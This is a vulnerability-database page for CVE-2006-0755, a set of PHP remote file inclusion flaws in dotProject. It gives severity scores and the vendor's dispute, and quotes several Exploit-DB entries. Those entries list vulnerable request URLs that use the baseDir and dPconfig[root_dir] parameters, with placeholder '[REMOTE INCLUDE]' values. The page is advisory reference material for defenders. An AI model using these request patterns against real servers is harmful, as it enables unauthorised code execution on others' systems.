CVE-2006-0755
published 2006-02-18CVE-2006-0755: Multiple PHP remote file include vulnerabilities in dotProject 2.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary…
PriorityP336medium5.6CVSS 3.1
AVNACHPRNUINSUCLILAL
EXPLOIT
EPSS
7.85%
93.9th percentile
Multiple PHP remote file include vulnerabilities in dotProject 2.0.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary commands via the baseDir parameter in (1) db_adodb.php, (2) db_connect.php, (3) session.php, (4) vw_usr_roles.php, (5) calendar.php, (6) date_format.php, and (7) tasks/gantt.php; and the dPconfig[root_dir] parameter in (8) projects/gantt.php, (9) gantt2.php, and (10) vw_files.php. NOTE: the vendor disputes this issue, stating that the product documentation clearly recommends that the system administrator disable register_globals, and that the check.php script warns against this setting. Also, the vendor says that the protection.php/siteurl vector is incorrect because protection.php does not exist in the product
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dotproject | dotproject | — | — |
| dotproject | dotproject | — | — |
CVSS provenance
nvdv3.15.6MEDIUMCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
nvdv2.05.1MEDIUMAV:N/AC:H/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
dotProject 2.1.6 - Remote File Inclusion
exploitdb·2012-11-14
CVE-2006-0755 dotProject 2.1.6 - Remote File Inclusion
dotProject 2.1.6 - Remote File Inclusion
---
:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
[ 2012-11-13 ]
#################################################################
# [ dotProject <= 2.1.6 ] Remote File Inclusion Vulnerability #
#################################################################
#
# Script: "PHP web-based project management framework that includes modules for companies,
# projects, tasks (with Gantt charts), forums, files, calendar, contacts, tickets/helpdesk,
# multi-language support, user/module permissions and themes"
#
# Vendor: http://www.dotproject.net/
# Download: http://sourceforge.net/projects/dotproject/f
Exploit-DB
dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion
dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion
dotProject 2.0 - '/modules/public/calendar.php?baseDir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion
dotProject 2.0 - '/includes/db_connect.php?baseDir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com/includes/db_connect.php?baseDir=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion
dotProject 2.0 - '/modules/projects/gantt2.php?dPconfig[root_dir]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion
dotProject 2.0 - '/modules/tasks/gantt.php?baseDir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion
dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion
dotProject 2.0 - '/includes/session.php?baseDir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com/includes/session.php?baseDir=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion
dotProject 2.0 - '/modules/admin/vw_usr_roles.php?baseDir' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
Exploit-DB
dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion
exploitdb·2006-02-14
CVE-2006-0755 dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion
dotProject 2.0 - '/modules/projects/gantt.php?dPconfig[root_dir]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/16648/info
Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. These may facilitate a compromise of the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
No writeups or analysis indexed.
http://secunia.com/advisories/18879http://www.osvdb.org/23209http://www.osvdb.org/23210http://www.osvdb.org/23211http://www.osvdb.org/23212http://www.osvdb.org/23213http://www.osvdb.org/23214http://www.osvdb.org/23215http://www.osvdb.org/23216http://www.osvdb.org/23217http://www.osvdb.org/23218http://www.osvdb.org/23219http://www.securityfocus.com/archive/1/424957/100/0/threadedhttp://www.securityfocus.com/archive/1/425285/100/0/threadedhttp://www.securityfocus.com/bid/16648http://www.vupen.com/english/advisories/2006/0604https://exchange.xforce.ibmcloud.com/vulnerabilities/24738http://secunia.com/advisories/18879http://www.osvdb.org/23209http://www.osvdb.org/23210http://www.osvdb.org/23211http://www.osvdb.org/23212http://www.osvdb.org/23213http://www.osvdb.org/23214http://www.osvdb.org/23215http://www.osvdb.org/23216http://www.osvdb.org/23217http://www.osvdb.org/23218http://www.osvdb.org/23219http://www.securityfocus.com/archive/1/424957/100/0/threadedhttp://www.securityfocus.com/archive/1/425285/100/0/threadedhttp://www.securityfocus.com/bid/16648http://www.vupen.com/english/advisories/2006/0604https://exchange.xforce.ibmcloud.com/vulnerabilities/24738
2006-02-18
Published